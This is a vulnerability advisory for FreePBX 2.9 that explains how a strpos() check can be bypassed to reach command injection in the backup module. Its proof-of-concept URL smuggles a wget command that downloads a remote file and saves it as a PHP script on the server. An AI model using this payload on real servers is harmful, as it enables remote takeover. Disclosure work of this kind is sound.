Twenty Year Anniversary

FreePBX 2.9 Remote Command Execution

FreePBX 2.9 Remote Command Execution
Posted Apr 27, 2013
Authored by Ahmed Aboul-Ela

FreePBX version 2.9 suffers from a backup module remote command execution vulnerability.

tags | exploit, remote
MD5 | 582fa2e5544c8c4da6487f4ceb1b05ba

FreePBX 2.9 Remote Command Execution

Change Mirror Download
# Title: FreePBX 2.9 Backup Module Remote Command Execution Vulnerability
# Author: Ahmed Aboul-Ela
# Contact: Ahmed.Aboul3la[at]gmail[dot]com
# Vendor: http://www.freepbx.org
# Software Link: http://mirror.freepbx.org/freepbx-2.9.0.tar.gz
# Version: 2.9 and prior versions should be affected too
# Tested on: Linux (Centos)

- Introduction:

FreePBX is an (graphical user interface) that controls and manages Asterisk, the world's most popular open source telephony engine software.
FreePBX has been developed and hardened by thousands of volunteers over tens of thousands man hours.
FreePBX has been downloaded over 5,000,000 times and estimates over 500,000 active phone systems.

- Vulnerability Explanation:

The vulnerability affects the "page.backup.php" file in the Backup Module of the FreePBX 2.9 which lead to a remote command execution
The affected $dir parameter is already sanitized and protected in the code but it suffers from a weakness that can be used to bypass this sanitization

The following if condition code is used to protect and sanitize the $dir variable in page.backup.php:

if (strstr($dir, '..') || strpos($dir, '\'') || strpos($dir, '"') || strpos($dir, '\'') || strpos($dir,'\`') ||
strstr($file, '..') || strpos($file, '\'') || strpos($file, '"') || strpos($file, '\'') || strpos($file,'\`') ||
strpos($id, '.') || strpos($id, '\'') || strpos($id, '"') || strpos($id, '\'') || strpos($id,'\`') ||
strpos($filetype, '.') || strpos($filetype, '\'') || strpos($filetype, '"') || strpos($filetype, '\'') || strpos($filetype,'\`')) {
print "You're trying to use an invalid character. Please don't.\n";
exit;
}

it should prevent the $dir variable from containing any single or double quotes by checking the presence of it using the strpos() function
but unfortunately there is a weakness in using strpos() that could be used to bypass the sanitization

According to php.net strpos() manual the function should return an integer number which represent the position of the character in the string and it starts the count from 0
so the first position of a character in a string will be 0 and this is the trick which will be used to bypass the sanitization function

if the single quote is the first character in the $dir variable then the strpos function will return 0 number
And if() statement doesn't check for the return type it only check for value so it will consider 0 returned from strpos() as a boolean value not an integer
the 0 for boolean means FALSE so the if condition will be False and it won't detect the single quote at the variable so it will bypass it :)


- Vulnerable Code Snippet at /admin/modules/backup/page.backup.php

LINE 25: $action = isset($_REQUEST['action'])?$_REQUEST['action']:'';
LINE 29: $dir=isset($_REQUEST['dir'])?$_REQUEST['dir']:'';
LINE 35: // The Sanitization code as mentioned
LINE 44: switch ($action) {
LINE 64: case "deletedataset":
LINE 65: exec("/bin/rm -rf '$dir'");

- Proof of Concept:

> To Execute command: wget http://site.com/file.txt -O file.php

http://[ip]/freepbx/admin/modules/backup/page.backup.php?action=deletedataset&dir=';wget http://site.com/file.txt -O file.php; echo 'mission done

> The the evaluated command will be:

/bin/rm -rf '';wget http://site.com/file.txt -O file.php; echo 'mission done'

- Fix / Solution:

you should upgrade to version 2.10

- Credits:

Ahmed Aboul-Ela - Information Security Consultant @ Starware Group

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

May 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    15 Files
  • 2
    May 2nd
    17 Files
  • 3
    May 3rd
    30 Files
  • 4
    May 4th
    29 Files
  • 5
    May 5th
    2 Files
  • 6
    May 6th
    3 Files
  • 7
    May 7th
    13 Files
  • 8
    May 8th
    27 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    15 Files
  • 11
    May 11th
    8 Files
  • 12
    May 12th
    2 Files
  • 13
    May 13th
    8 Files
  • 14
    May 14th
    7 Files
  • 15
    May 15th
    43 Files
  • 16
    May 16th
    19 Files
  • 17
    May 17th
    16 Files
  • 18
    May 18th
    15 Files
  • 19
    May 19th
    3 Files
  • 20
    May 20th
    7 Files
  • 21
    May 21st
    15 Files
  • 22
    May 22nd
    40 Files
  • 23
    May 23rd
    61 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close